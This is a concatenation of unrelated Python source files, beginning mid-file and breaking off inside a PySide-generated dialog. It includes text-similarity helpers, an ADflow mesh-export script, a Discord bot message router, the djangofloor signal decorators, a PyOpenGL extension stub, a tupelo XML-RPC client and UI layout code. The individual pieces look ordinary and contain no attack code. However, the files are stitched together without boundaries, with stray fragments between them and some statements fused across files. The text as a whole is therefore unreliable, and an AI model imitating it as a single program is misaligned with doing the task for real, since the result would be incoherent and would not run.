row_magnitudes += np.finfo(float).eps return M / row_magnitudes @staticmethod def _reinforce(A, B): return 0.25*(A + B + 2*(A*B)) def _amplify(self, x): return self._h + (self._f/(1+(self._a*math.exp(self._b*(x-self._c))))) @staticmethod @numba.vectorize([numba.float64(numba.float64)]) def _amplifier(x): return 1/(1+(3.2*math.exp(-7.5*(x-0.46)))) class InteractionMatrix(): def __init__(self, I): self._matrix = I def available_metrics(self): return self._available_interactions def maxpool(self, direction='horizontal'): axis = 1 if direction == 'horizontal' else 0 return np.max(self._matrix, axis=axis) embeddings = GloveWordEmbeddings() sifs = embeddings.sifs from scipy.spatial import distance from core.utils import normalize_rows class BagOfVectors(): def __init__(self, vectors): self._vectors = vectors @classmethod def wmd(self, bov1, bov2, dist_fn=distance.cosine): n1 = len(bov1) n2 = len(bov2) if n1 == 0 or n2 == 0: return math.inf dists = np.zeros((n1, n2)) for i, v1 in enumerate(bov1): for j, v2 in enumerate(bov2): dists[i, j] = dist_fn(v1, v2) return dists.min(axis=1).sum() class BagOfEntities(set): def __init__(self, entities): super().__init__(entities) self._entities = set(entities) def non_overlapping(self): independent = set([]) for entity in self._entities: if not self._is_part_of_another(entity): independent.add(entity) return independent def _is_part_of_another(self, entity): separator = r'[\_\s]' for target in self._entities: if target == entity: continue if re.search(rf'^{entity}{separator}', target): return True if re.search(rf'{separator}{entity}{separator}', target): return True if re.search(rf'{separator}{entity}$', target): return True return False """ This script was used to generate the onera_m6.json input file needed for the MultiUSMesh test. It could also be useful for creating other tests in the future. We use ADflow to get mesh information and then write it as a dictionary in a JSON file. Unlike USMesh, MultiUSMesh needs surface information before generating internal surfaces. By saving the mesh data, we avoid adding ADflow as a testing dependency. """ import os from adflow import ADFLOW from baseclasses.utils import writeJSON baseDir = os.path.dirname(os.path.abspath(__file__)) gridFile = os.path.join(baseDir, "../input_files/onera_m6.cgns") # Set up ADflow aeroOptions = { "gridFile": gridFile, "outputDirectory": baseDir, "MGCycle": "sg", # This is needed to avoid problems with coarse grid initialization } CFDSolver = ADFLOW(options=aeroOptions) # Get the mesh data from ADflow meshInd = CFDSolver.getSolverMeshIndices() conn, faceSizes, cgnsBlockIDs = CFDSolver.getSurfaceConnectivity( CFDSolver.meshFamilyGroup, includeZipper=False, includeCGNS=True ) pts = CFDSolver.getSurfaceCoordinates(CFDSolver.meshFamilyGroup, includeZipper=False) # Save the ADflow output meshData = { "meshInd": meshInd, "conn": conn, "faceSizes": faceSizes, "cgnsBlockIDs": cgnsBlockIDs, "pts": pts, } jsonFile = os.path.join(baseDir, "onera_m6.json") writeJSON(jsonFile, meshData) 100-1000 from discord import Client, Message from pymysql import Connection from src.Storage import Storage from src.controller.routes.blackJack.hit import blackJackHitWithPrivateMessage from src.controller.routes.blackJack.stay import blackJackStayWithPrivateMsg from src.controller.routes.anonymityBoard import anonymityBoard from src.controller.routes.help.getHelp import getHelp from src.controller.routes.help.getHelpForMoney import getHelpForMoney from src.controller.routes.help.getHelpForAnnomity import getHelpForAnnomity from src.controller.routes.help.getHelpForBlackJack import getHelpForBlackJack from src.controller.routes.help.getHelpForCommand import getHelpForCommand from src.controller.routes.help.getHelpForGift import getHelpForGift from src.controller.routes.help.getHelpForLottery import getHelpForLottery from src.controller.routes.help.getHelpForTaxesPoker import getHelpForTaxesPoker from src.controller.routes.help.getHelpForVIP import getHelpForVIP import re async def privateMsgRouter(self: Client, message: Message, db: Connection, storage: Storage): if re.match(f"^要$", message.content): await blackJackHitWithPrivateMessage(self, message, storage.casino, storage.gamePlayerWaiting) return if re.match(f"^不要$", message.content): await blackJackStayWithPrivateMsg(self, db, message, storage.casino, storage.gamePlayerWaiting) return if re.match(f"^匿名 .+", message.content): await anonymityBoard(self, message, message.content, db, storage.anonymityBoardChannel) return if re.match(f"^帮助$", message.content): await getHelp(self, message) return if re.match(f"^1$", message.content): await getHelpForMoney(self, message) return if re.match(f"^2$", message.content): await getHelpForCommand(self, message) return if re.match(f"^3$", message.content): await getHelpForGift(self, message) return if re.match(f"^4$", message.content): await getHelpForVIP(self, message) return if re.match(f"^5$", message.content): await getHelpForBlackJack(self, message) return if re.match(f"^6$", message.content): await getHelpForTaxesPoker(self, message) return if re.match(f"^7$", message.content): await getHelpForLottery(self, message) return if re.match(f"^8$", message.content): await getHelpForAnnomity(self, message) return"""Decorators to declare signals and remote functions ================================================== ALso define common functions for allowing (or not) signal calls to user, and several tools for checking arguments provided to the signal (or function). Decorators ---------- Three decorators are provided, for creating signals, websocket functions or special signals for validating forms. Original functions are left unmodified by the decorators. These decorators instantiate a :class:`djangofloor.decorators.Connection` object and stores it in the corresponding dict (`REGISTERED_FUNCTIONS` or `REGISTERED_SIGNALS`). Restrict signal/function use ---------------------------- When creating a connection, you provide a callable that checks if the browser is allowed to call this code. By default, the registered code can only be called from Python code. The callable takes three arguments: * the called :class:`djangofloor.decorators.Connection` (signal or ws function), * the :class:`djangofloor.window_info.WindowInfo` object, * the kwarg dict with unmodified arguments. Argument validators ------------------- The registered Python code can use py3 annotation for specifying data types. .. code-block:: python from djangofloor.decorators import Choice, RE, SerializedForm from django import forms class MyForm(forms.Form): test = forms.CharField() @signal(path='demo.signal') def my_signal(window_info, kwarg1: Choice([1, 2], int)=1, kwarg2: Re('^\\d+$', int)=2, kwarg3: SerializedForm(MyForm)): assert isinstance(kwarg1, int) assert isinstance(kwarg2, int) assert isinstance(kwarg3, MyForm) scall(window_info, 'demo.signal', to=[SERVER], kwarg1="1", kwarg2="12312", kwarg3=[{'value': '12', 'name': 'test'}]) """ import io import logging import mimetypes import os import random import re import warnings from django import forms from django.conf import settings from django.core.files.uploadedfile import InMemoryUploadedFile from django.forms import FileField from django.http import QueryDict from djangofloor.utils import RemovedInDjangoFloor200Warning try: from inspect import signature except ImportError: # noinspection PyUnresolvedReferences,PyPackageRequirements from funcsigs import signature __author__ = "" logger = logging.getLogger("djangofloor.signals") REGISTERED_SIGNALS = {} REGISTERED_FUNCTIONS = {} class DynamicQueueName: """Allow to dynamically select a Celery queue when the signal is called. You can use it if all signals of a user must be processed by the same worker, but you still want to dispatch signals to several workers. """ def __call__(self, connection, window_info, original_kwargs): """called for each signal call to dispatch this connection""" raise NotImplementedError def get_available_queues(self): """return the set of all queues that can be returned by the `__call__` method. However, if this method is not implemented, the impact is currently limited: * the monitoring view will not display all required queues, * the systemd service files (provided by the `packaging` command) will not create all required workers. """ return {settings.CELERY_DEFAULT_QUEUE} class RandomDynamicQueueName(DynamicQueueName): """Return a random queue on each signal call. This class is somewhat useless since you could just run more workers on the same queue. >>> q = RandomDynamicQueueName('prefix-', 2) >>> q.get_available_queues() == {'prefix-0', 'prefix-1'} True >>> q(None, None, None) in {'prefix-0', 'prefix-1'} True """ def __init__(self, prefix: str, size: int): """ :param prefix: prefix of the queue :param size: number of available queues """ self.prefix = prefix self.size = size def __call__(self, connection, window_info, original_kwargs): return "%s%d" % (self.prefix, random.randint(0, self.size - 1)) def get_available_queues(self): return {"%s%d" % (self.prefix, x) for x in range(self.size)} # noinspection PyUnusedLocal def server_side(connection, window_info, kwargs): """never allows a signal to be called from WebSockets; this signal can only be called from Python code. This is the default choice. >>> @signal(is_allowed_to=server_side) >>> def my_signal(window_info, arg1=None): >>> print(window_info, arg1) """ return False # noinspection PyUnusedLocal def everyone(connection, window_info, kwargs): """allow everyone to call a Python WS signal or remote function >>> @signal(is_allowed_to=everyone) >>> def my_signal(request, arg1=None): >>> print(request, arg1) """ return True # noinspection PyUnusedLocal def is_authenticated(connection, window_info, kwargs): """restrict a WS signal or a WS function to authenticated users >>> @signal(is_allowed_to=is_authenticated) >>> def my_signal(request, arg1=None): >>> print(request, arg1) """ return window_info and window_info.is_authenticated # noinspection PyUnusedLocal def is_anonymous(connection, window_info, kwargs): """restrict a WS signal or a WS function to anonymous users >>> @signal(is_allowed_to=is_anonymous) >>> def my_signal(request, arg1=None): >>> print(request, arg1) """ return window_info and window_info.is_anonymous # noinspection PyUnusedLocal def is_staff(connection, window_info, kwargs): """restrict a WS signal or a WS function to staff users >>> @signal(is_allowed_to=is_staff) >>> def my_signal(request, arg1=None): >>> print(request, arg1) """ return window_info and window_info.is_staff # noinspection PyUnusedLocal def is_superuser(connection, window_info, kwargs): """restrict a WS signal or a WS function to superusers >>> @signal(is_allowed_to=is_superuser) >>> def my_signal(request, arg1=None): >>> print(request, arg1) """ return window_info and window_info.is_superuser # noinspection PyPep8Naming class has_perm: """restrict a WS signal or a WS function to users with permission "perm" >>> @signal(is_allowed_to=has_perm('app_label.codename')) >>> def my_signal(request, arg1=None): >>> print(request, arg1) """ def __init__(self, perm): self.perm = perm # noinspection PyUnusedLocal def __call__(self, connection, window_info, kwargs): return window_info and window_info.has_perm(self.perm) class Connection: """Parent class of a registered signal or remote function. Do not use it directly.""" required_function_arg = "window_info" def __init__(self, fn, path=None, is_allowed_to=server_side, queue=None): self.function = fn if not path: if getattr(fn, "__module__", None) and getattr(fn, "__name__", None): path = "%s.%s" % (fn.__module__, fn.__name__) elif getattr(fn, "__name__", None): path = fn.__name__ self.path = str(path) if not re.match(r"^([_a-zA-Z]\w*)(\.[_a-zA-Z]\w*)*$", self.path): raise ValueError("Invalid identifier: %s" % self.path) self.is_allowed_to = is_allowed_to self.queue = queue or settings.CELERY_DEFAULT_QUEUE self.accept_kwargs = False self.argument_types = {} self.required_arguments_names = set() self.optional_arguments_names = set() self.accepted_argument_names = set() self.signature_check(fn) # noinspection PyTypeChecker if hasattr(fn, "__name__"): self.__name__ = fn.__name__ def signature_check(self, fn): """Analyze the signature of the registered Python code, and store the annotations. Check if the first argument is `window_info`. """ # fetch signature to analyze arguments sig = signature(fn) required_arg_is_present = False for key, param in sig.parameters.items(): if key == self.required_function_arg: required_arg_is_present = True continue if param.kind == param.VAR_KEYWORD: # corresponds to "fn(**kwargs)" self.accept_kwargs = True elif param.kind == param.VAR_POSITIONAL: # corresponds to "fn(*args)" raise ValueError("Cannot connect a signal using the *%s syntax" % key) elif ( param.default == param.empty ): # "fn(foo)" : kind = POSITIONAL_ONLY or POSITIONAL_OR_KEYWORD self.required_arguments_names.add(key) if param.annotation != param.empty and callable(param.annotation): self.argument_types[key] = param.annotation self.accepted_argument_names.add(key) else: # "fn(foo=bar)" : kind = POSITIONAL_OR_KEYWORD or KEYWORD_ONLY self.optional_arguments_names.add(key) self.accepted_argument_names.add(key) if param.annotation != param.empty and callable(param.annotation): self.argument_types[key] = param.annotation if self.required_function_arg and not required_arg_is_present: msg = '%s(%s) must takes "%s" as first argument' % ( self.__class__.__name__, self.path, self.required_function_arg, ) raise ValueError(msg) def check(self, kwargs): """Check the provided kwargs and apply provided annotations to it. Return `None` if something is invalid (like an error raised by an annotation or a missing argument). """ cls = self.__class__.__name__ for k, v in self.argument_types.items(): try: if k in kwargs: kwargs[k] = v(kwargs[k]) except ValueError: logger.warning( '%s("%s"): Invalid value %r for argument "%s".' % (cls, self.path, kwargs[k], k) ) return None except TypeError: logger.warning( '%s("%s"): Invalid value %r for argument "%s".' % (cls, self.path, kwargs[k], k) ) return None for k in self.required_arguments_names: if k not in kwargs: logger.warning( '%s("%s"): Missing required argument "%s".' % (cls, self.path, k) ) return None if not self.accept_kwargs: for k in kwargs: if k not in self.accepted_argument_names: logger.warning( '%s("%s"): Invalid argument "%s".' % (cls, self.path, k) ) return None return kwargs def __call__(self, window_info, **kwargs): return self.function(window_info, **kwargs) def register(self): """Register the Python code to the right dict.""" raise NotImplementedError def get_queue(self, window_info, original_kwargs): """Provide the Celery queue name as a string.""" if callable(self.queue): return str(self.queue(self, window_info, original_kwargs)) return str(self.queue) or settings.CELERY_DEFAULT_QUEUE class SignalConnection(Connection): """represents a connected signal. """ def register(self): """register the signal into the `REGISTERED_SIGNALS` dict """ REGISTERED_SIGNALS.setdefault(self.path, []).append(self) def call(self, window_info, **kwargs): from djangofloor.tasks import call, SERVER call(window_info, self.path, to=SERVER, kwargs=kwargs) class FunctionConnection(Connection): """represent a WS function """ def register(self): """register the WS function into the `REGISTERED_FUNCTIONS` dict """ REGISTERED_FUNCTIONS[self.path] = self class FormValidator(FunctionConnection): """Special signal, dedicated to dynamically validate a HTML form. However, files cannot be sent in the validation process. """ def signature_check(self, fn): """override the default method for checking the arguments, since they are independent from the Django Form. """ if not isinstance(fn, type) or not issubclass(fn, forms.BaseForm): raise ValueError("validate_form only apply to Django Forms") self.required_arguments_names = set() self.optional_arguments_names = {"data"} self.accepted_argument_names = {"data"} def __call__(self, window_info, data=None): form = SerializedForm(self.function)(data) valid = form.is_valid() return { "valid": valid, "errors": { f: e.get_json_data(escape_html=False) for f, e in form.errors.items() }, "help_texts": { f: e.help_text for (f, e) in form.fields.items() if e.help_text }, } def signal( fn=None, path=None, is_allowed_to=server_side, queue=None, cls=SignalConnection ): """Decorator to use for registering a new signal. This decorator returns the original callable as-is. """ def wrapped(fn_): wrapper = cls(fn=fn_, path=path, is_allowed_to=is_allowed_to, queue=queue) wrapper.register() return fn_ if fn is not None: wrapped = wrapped(fn) return wrapped # noinspection PyShadowingBuiltins def function(fn=None, path=None, is_allowed_to=server_side, queue=None): """Allow the following Python code to be called from the JavaScript code. The result of this function is serialized (with JSON and `settings.WEBSOCKET_SIGNAL_ENCODER`) before being sent to the JavaScript part. .. code-block:: python from djangofloor.decorators import function, everyone @function(path='myproject.myfunc', is_allowed_to=everyone) def myfunc(window_info, arg=None) print(arg) return 42 The this function can be called from your JavaScript code: .. code-block:: javascript $.dfws.myproject.myfunc({arg: 3123}).then(function(result) { alert(result); }); """ return signal( fn=fn, path=path, is_allowed_to=is_allowed_to, queue=queue, cls=FunctionConnection, ) def validate_form(form_cls=None, path=None, is_allowed_to=server_side, queue=None): """ Decorator for automatically validating HTML forms. Just add it to your Python code and set the 'onchange' attribute to your HTML code. The `path` argument should be unique to your form class. :param form_cls: any subclass of :class:`django.forms.Form` :param path: unique name of your form :param is_allowed_to: callable for restricting the use of the form validation :param queue: name (or callable) for ensuring small response times .. code-block:: python from djangofloor.decorators import everyone, validate_form @validate_form(path='djangofloor.validate.search', is_allowed_to=everyone, queue='fast') class MyForm(forms.Form): name = forms.CharField() ... .. code-block:: html
    {% csrf_token %} {% bootstrap_form form %}
    """ if path is None or is_allowed_to is server_side: # @validate_form # class MyForm(forms.Form): # ... raise ValueError( "is_allowed_to and path are not configured for the validate_form decorator" ) def wrapped(form_cls_): wrapper = FormValidator( form_cls_, path=path, is_allowed_to=is_allowed_to, queue=queue ) wrapper.register() return form_cls_ if form_cls: return wrapped(form_cls) return wrapped class RE: """ used to check if a string value matches a given regexp. Example (requires Python 3.2+), for a function that can only handle a string of the form 123a456: .. code-block:: python @signal(path='myproject.signals.test') def test(window_info, value: RE('\\d{3}a\\d{3}')): pass Your code won't be called for values like "abc". :param value: regexp pattern :type value: `str` :param caster: if not `None`, any callable applied to the value (if valid) :type caster: `callable` or `None` :param flags: regexp flags passed to `re.compile` :type flags: `int` """ def __init__(self, value, caster=None, flags=0): self.caster = caster self.regexp = re.compile(value, flags=flags) def __call__(self, value): matcher = self.regexp.match(str(value)) if not matcher: raise ValueError value = matcher.group(1) if matcher.groups() else value return self.caster(value) if self.caster else value class Choice: """ used to check if a value is among some valid choices. Example (requires Python 3.2+), for a function that can only two values: .. code-block:: python @signal(path='myproject.signals.test') def test(window_info, value: Choice([True, False])): pass Your code wan't be called if value is not True or False. :param caster: callable to convert the provided deserialized JSON data before checking its validity. """ def __init__(self, values, caster=None): self.values = set(values) self.caster = caster def __call__(self, value): value = self.caster(value) if self.caster else value if value not in self.values: raise ValueError return value class SerializedForm: """Transform values sent by JS to a Django form. Given a form and a :class:`list` of :class:`dict`, transforms the :class:`list` into a :class:`django.http.QueryDict` and initialize the form with it. >>> from django import forms >>> class SimpleForm(forms.Form): ... field = forms.CharField() ... >>> x = SerializedForm(SimpleForm) >>> form = x([{'name': 'field', 'value': 'object'}]) >>> form.is_valid() True How to use it with Python3: .. code-block:: python @signal(path='myproject.signals.test') def test(window_info, value: SerializedForm(SimpleForm), other: int): print(value.is_valid()) How to use it with Python2: .. code-block:: python @signal(path='myproject.signals.test') def test(window_info, value, other): value = SerializedForm(SimpleForm)(value) print(value.is_valid()) On the JS side, you can serialize the form with JQuery: .. code-block:: html
    """ def __init__(self, form_cls): self.form_cls = form_cls def __call__(self, value, *args, **kwargs): """ :param value: :type value: :class:`list` of :class:`dict` :return: :rtype: :class:`django.forms.Form` """ if value is None: return self.form_cls(*args, **kwargs) post_data = QueryDict("", mutable=True) file_data = QueryDict("", mutable=True) for obj in value: name = obj["name"] value = obj["value"] if name in self.form_cls.base_fields and isinstance( self.form_cls.base_fields[name], FileField ): mimetypes.init() basename = os.path.basename(value) (type_, __) = mimetypes.guess_type(basename) # it's a file => we need to simulate an uploaded one content = InMemoryUploadedFile( io.BytesIO(b"\0"), name, basename, type_ or "application/binary", 1, "utf-8", ) file_data.update({name: content}) else: post_data.update({name: value}) return self.form_cls(post_data, file_data, *args, **kwargs) class LegacySignalConnection(SignalConnection): """.. deprecated:: 1.0 do not use it""" def __call__(self, window_info, **kwargs): result = super().__call__(window_info, **kwargs) if result: # noinspection PyUnresolvedReferences from djangofloor.tasks import df_call for data in result: df_call( data["signal"], window_info, sharing=data.get("sharing"), from_client=False, kwargs=data["options"], ) def connect( fn=None, path=None, delayed=False, allow_from_client=True, auth_required=True ): """.. deprecated:: 1.0 do not use it""" delayed = delayed if not delayed: warnings.warn( 'The "delayed" argument is deprecated and useless.', RemovedInDjangoFloor200Warning, ) if allow_from_client and auth_required: is_allowed_to = is_authenticated elif allow_from_client: is_allowed_to = everyone else: is_allowed_to = server_side return signal(fn=fn, path=path, is_allowed_to=is_allowed_to) 0 from TaserChess_Main import * main()'''Autogenerated by xml_generate script, do not edit!''' from OpenGL import platform as _p, arrays # Code generation uses this from OpenGL.raw.GLES2 import _types as _cs # End users want this... from OpenGL.raw.GLES2._types import * from OpenGL.raw.GLES2 import _errors from OpenGL.constant import Constant as _C import ctypes _EXTENSION_NAME = 'GLES2_OES_texture_border_clamp' def _f( function ): return _p.createFunction( function,_p.PLATFORM.GLES2,'GLES2_OES_texture_border_clamp',error_checker=_errors._error_checker) GL_CLAMP_TO_BORDER_OES=_C('GL_CLAMP_TO_BORDER_OES',0x812D) GL_TEXTURE_BORDER_COLOR_OES=_C('GL_TEXTURE_BORDER_COLOR_OES',0x1004) @_f @_p.types(None,_cs.GLuint,_cs.GLenum,arrays.GLintArray) def glGetSamplerParameterIivOES(sampler,pname,params):pass @_f @_p.types(None,_cs.GLuint,_cs.GLenum,arrays.GLuintArray) def glGetSamplerParameterIuivOES(sampler,pname,params):pass @_f @_p.types(None,_cs.GLenum,_cs.GLenum,arrays.GLintArray) def glGetTexParameterIivOES(target,pname,params):pass @_f @_p.types(None,_cs.GLenum,_cs.GLenum,arrays.GLuintArray) def glGetTexParameterIuivOES(target,pname,params):pass @_f @_p.types(None,_cs.GLuint,_cs.GLenum,arrays.GLintArray) def glSamplerParameterIivOES(sampler,pname,param):pass @_f @_p.types(None,_cs.GLuint,_cs.GLenum,arrays.GLuintArray) def glSamplerParameterIuivOES(sampler,pname,param):pass @_f @_p.types(None,_cs.GLenum,_cs.GLenum,arrays.GLintArray) def glTexParameterIivOES(target,pname,params):pass @_f @_p.types(None,_cs.GLenum,_cs.GLenum,arrays.GLuintArray) def glTexParameterIuivOES(target,pname,params):pass tupelo/xmlrpc.py #!/usr/bin/env python # vim: set sts=4 sw=4 et: import time import xmlrpc.client from . import players from . import rpc from .common import GameState, CardSet, GameError, RuleError, ProtocolError, simple_decorator from .events import EventList, CardPlayedEvent, MessageEvent, TrickPlayedEvent, TurnEvent, StateChangedEvent @simple_decorator def error2fault(func): """ Catch known exceptions and translate them to XML-RPC faults. """ def catcher(*args): try: return func(*args) except GameError as error: raise xmlrpc.client.Fault(GameError.rpc_code, str(error)) except RuleError as error: raise xmlrpc.client.Fault(RuleError.rpc_code, str(error)) except ProtocolError as error: raise xmlrpc.client.Fault(ProtocolError.rpc_code, str(error)) return catcher @simple_decorator def fault2error(func): """ Catch known XML-RPC faults and translate them to custom exceptions. """ def catcher(*args): try: return func(*args) except xmlrpc.client.Fault as error: error_classes = (GameError, RuleError, ProtocolError) for klass in error_classes: if error.faultCode == klass.rpc_code: raise klass(error.faultString) raise error return catcher class XMLRPCCliPlayer(players.CliPlayer): """ XML-RPC command line interface human player. """ def __init__(self, player_name): players.CliPlayer.__init__(self, player_name) self.game_state = GameState() self.hand = None def handle_event(self, event): if isinstance(event, CardPlayedEvent): self.card_played(event.player, event.card, event.game_state) elif isinstance(event, MessageEvent): self.send_message(event.sender, event.message) elif isinstance(event, TrickPlayedEvent): self.trick_played(event.player, event.game_state) elif isinstance(event, TurnEvent): self.game_state.update(event.game_state) state = self.controller.get_state(self.id) self.hand = state['hand'] self.game_state.update(state['game_state']) elif isinstance(event, StateChangedEvent): self.game_state.update(event.game_state) else: print("unknown event: %s" % event) def wait_for_turn(self): """ Wait for this player's turn. """ while True: time.sleep(0.5) if self.controller is not None: events = self.controller.get_events(self.id) for event in events: self.handle_event(event) if self.game_state.turn_id == self.id: break class XMLRPCProxyController(): """ Client-side proxy object for the server/GameController. """ def __init__(self, server_uri): super(XMLRPCProxyController, self).__init__() if not server_uri.startswith('http://') and \ not server_uri.startswith('https://'): server_uri = 'http://' + server_uri self.server = xmlrpc.client.ServerProxy(server_uri) self.game_id = None self.akey = None @fault2error def play_card(self, _player, card): self.server.game.play_card(self.akey, self.game_id, rpc.rpc_encode(card)) @fault2error def get_events(self, _player_id): return rpc.rpc_decode(EventList, self.server.get_events(self.akey)) @fault2error def get_state(self, _player_id): state = self.server.game.get_state(self.akey, self.game_id) state['game_state'] = rpc.rpc_decode(GameState, state['game_state']) state['hand'] = rpc.rpc_decode(CardSet, state['hand']) return state @fault2error def player_quit(self, _player_id): self.server.player.quit(self.akey) @fault2error def register_player(self, player): player.controller = self plr_data = self.server.player.register(rpc.rpc_encode(player)) player.id = plr_data['id'] self.akey = plr_data['akey'] @fault2error def start_game_with_bots(self): return self.server.game.start_with_bots(self.akey, self.game_id) @fault2error def create_game(self): self.game_id = self.server.game.create(self.akey) return self.game_id # -*- coding: utf-8 -*- # Form implementation generated from reading ui file '/home/eoyilmaz/Documents/development/oyProjectManager/oyProjectManager/ui/version_creator.ui' # # Created: Sun Oct 21 23:07:49 2012 # by: pyside-uic 0.2.13 running on PySide 1.1.1 # # WARNING! All changes made in this file will be lost! from PySide import QtCore, QtGui class Ui_Dialog(object): def setupUi(self, Dialog): Dialog.setObjectName("Dialog") Dialog.setWindowModality(QtCore.Qt.ApplicationModal) Dialog.resize(1312, 689) sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Preferred, QtGui.QSizePolicy.Preferred) sizePolicy.setHorizontalStretch(1) sizePolicy.setVerticalStretch(1) sizePolicy.setHeightForWidth(Dialog.sizePolicy().hasHeightForWidth()) Dialog.setSizePolicy(sizePolicy) Dialog.setSizeGripEnabled(True) Dialog.setModal(True) self.horizontalLayout = QtGui.QHBoxLayout(Dialog) self.horizontalLayout.setObjectName("horizontalLayout") self.verticalWidget = QtGui.QWidget(Dialog) sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Preferred, QtGui.QSizePolicy.Preferred) sizePolicy.setHorizontalStretch(1) sizePolicy.setVerticalStretch(1) sizePolicy.setHeightForWidth(self.verticalWidget.sizePolicy().hasHeightForWidth()) self.verticalWidget.setSizePolicy(sizePolicy) self.verticalWidget.setObjectName("verticalWidget") self.verticalLayout = QtGui.QVBoxLayout(self.verticalWidget) self.verticalLayout.setSizeConstraint(QtGui.QLayout.SetMaximumSize) self.verticalLayout.setContentsMargins(0, 0, 0, 0) self.verticalLayout.setContentsMargins(0, 0, 0, 0) self.verticalLayout.setObjectName("verticalLayout") self.horizontalLayout_11 = QtGui.QHBoxLayout() self.horizontalLayout_11.setObjectName("horizontalLayout_11") self.projects_label = QtGui.QLabel(self.verticalWidget) self.projects_label.setObjectName("projects_label") self.horizontalLayout_11.addWidget(self.projects_label) self.projects_comboBox = QtGui.QComboBox(self.verticalWidget) self.projects_comboBox.setMaxVisibleItems(50) self.projects_comboBox.setObjectName("projects_comboBox") self.horizontalLayout_11.addWidget(self.projects_comboBox) self.client_label = QtGui.QLabel(self.verticalWidget) self.client_label.setObjectName("client_label") self.horizontalLayout_11.addWidget(self.client_label) self.client_name_label = QtGui.QLabel(self.verticalWidget) self.client_name_label.setObjectName("client_name_label") self.horizontalLayout_11.addWidget(self.client_name_label) spacerItem = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum) self.horizontalLayout_11.addItem(spacerItem) self.user_label = QtGui.QLabel(self.verticalWidget) self.user_label.setObjectName("user_label") self.horizontalLayout_11.addWidget(self.user_label) self.users_comboBox = QtGui.QComboBox(self.verticalWidget) self.users_comboBox.setObjectName("users_comboBox") self.horizontalLayout_11.addWidget(self.users_comboBox) self.verticalLayout.addLayout(self.horizontalLayout_11) self.line_3 = QtGui.QFrame(self.verticalWidget) self.line_3.setFrameShape(QtGui.QFrame.HLine) self.line_3.setFrameShadow(QtGui.QFrame.Sunken) self.line_3.setObjectName("line_3") self.verticalLayout.addWidget(self.line_3) self.horizontalLayout_14 = QtGui.QHBoxLayout() self.horizontalLayout_14.setObjectName("horizontalLayout_14") self.verticalLayout_5 = QtGui.QVBoxLayout() self.verticalLayout_5.setSpacing(6) self.verticalLayout_5.setObjectName("verticalLayout_5") self.tabWidget = QtGui.QTabWidget(self.verticalWidget) self.tabWidget.setEnabled(True) self.tabWidget.setObjectName("tabWidget") self.assets_tab = QtGui.QWidget() self.assets_tab.setEnabled(True) sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Preferred, QtGui.QSizePolicy.Preferred) sizePolicy.setHorizontalStretch(1) sizePolicy.setVerticalStretch(1) sizePolicy.setHeightForWidth(self.assets_tab.sizePolicy().hasHeightForWidth()) self.assets_tab.setSizePolicy(sizePolicy) self.assets_tab.setObjectName("assets_tab") self.verticalLayout_4 = QtGui.QVBoxLayout(self.assets_tab) self.verticalLayout_4.setObjectName("verticalLayout_4") self.asset_info_groupBox = QtGui.QGroupBox(self.assets_tab) self.asset_info_groupBox.setFlat(False) self.asset_info_groupBox.setObjectName("asset_info_groupBox") self.verticalLayout_3 = QtGui.QVBoxLayout(self.asset_info_groupBox) self.verticalLayout_3.setObjectName("verticalLayout_3") self.horizontalLayout_3 = QtGui.QHBoxLayout() self.horizontalLayout_3.setObjectName("horizontalLayout_3") self.verticalLayout_2 = QtGui.QVBoxLayout() self.verticalLayout_2.setObjectName("verticalLayout_2") self.horizontalLayout_9 = QtGui.QHBoxLayout() self.horizontalLayout_9.setObjectName("horizontalLayout_9") self.asset_name_label = QtGui.QLabel(self.asset_info_groupBox) font = QtGui.QFont() font.setWeight(50) font.setBold(False) self.asset_name_label.setFont(font) self.asset_name_label.setObjectName("asset_name_label") self.horizontalLayout_9.addWidget(self.asset_name_label) spacerItem1 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Maximum, QtGui.QSizePolicy.Minimum) self.horizontalLayout_9.addItem(spacerItem1) self.create_asset_pushButton = QtGui.QPushButton(self.asset_info_groupBox) self.create_asset_pushButton.setObjectName("create_asset_pushButton") self.horizontalLayout_9.addWidget(self.create_asset_pushButton) self.verticalLayout_2.addLayout(self.horizontalLayout_9) self.assets_tableWidget = QtGui.QTableWidget(self.asset_info_groupBox) self.assets_tableWidget.setEditTriggers(QtGui.QAbstractItemView.NoEditTriggers) self.assets_tableWidget.setSelectionMode(QtGui.QAbstractItemView.SingleSelection) self.assets_tableWidget.setSelectionBehavior(QtGui.QAbstractItemView.SelectRows) self.assets_tableWidget.setColumnCount(2) self.assets_tableWidget.setObjectName("assets_tableWidget") self.assets_tableWidget.setColumnCount(2) self.assets_tableWidget.setRowCount(0) item = QtGui.QTableWidgetItem() self.assets_tableWidget.setHorizontalHeaderItem(0, item) item = QtGui.QTableWidgetItem() self.assets_tableWidget.setHorizontalHeaderItem(1, item) self.assets_tableWidget.horizontalHeader().setStretchLastSection(True) self.verticalLayout_2.addWidget(self.assets_tableWidget) self.horizontalLayout_3.addLayout(self.verticalLayout_2) self.verticalLayout_3.addLayout(self.horizontalLayout_3) self.verticalLayout_4.addWidget(self.asset_info_groupBox) self.tabWidget.addTab(self.assets_tab, "") self.shots_tab = QtGui.QWidget() self.shots_tab.setEnabled(True) self.shots_tab.setObjectName("shots_tab") self.verticalLayout_11 = QtGui.QVBoxLayout(self.shots_tab) self.verticalLayout_11.setObjectName("verticalLayout_11") self.horizontalLayout_15 = QtGui.QHBoxLayout() self.horizontalLayout_15.setObjectName("horizontalLayout_15") self.sequences_label = QtGui.QLabel(self.shots_tab) self.sequences_label.setObjectName("sequences_label") self.horizontalLayout_15.addWidget(self.sequences_label) self.sequences_comboBox = QtGui.QComboBox(self.shots_tab) self.sequences_comboBox.setObjectName("sequences_comboBox") self.horizontalLayout_15.addWidget(self.sequences_comboBox) spacerItem2 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum) self.horizontalLayout_15.addItem(spacerItem2) self.verticalLayout_11.addLayout(self.horizontalLayout_15) self.asset_info_groupBox_2 = QtGui.QGroupBox(self.shots_tab) self.asset_info_groupBox_2.setFlat(False) self.asset_info_groupBox_2.setObjectName("asset_info_groupBox_2") self.verticalLayout_8 = QtGui.QVBoxLayout(self.asset_info_groupBox_2) self.verticalLayout_8.setObjectName("verticalLayout_8") self.horizontalLayout_12 = QtGui.QHBoxLayout() 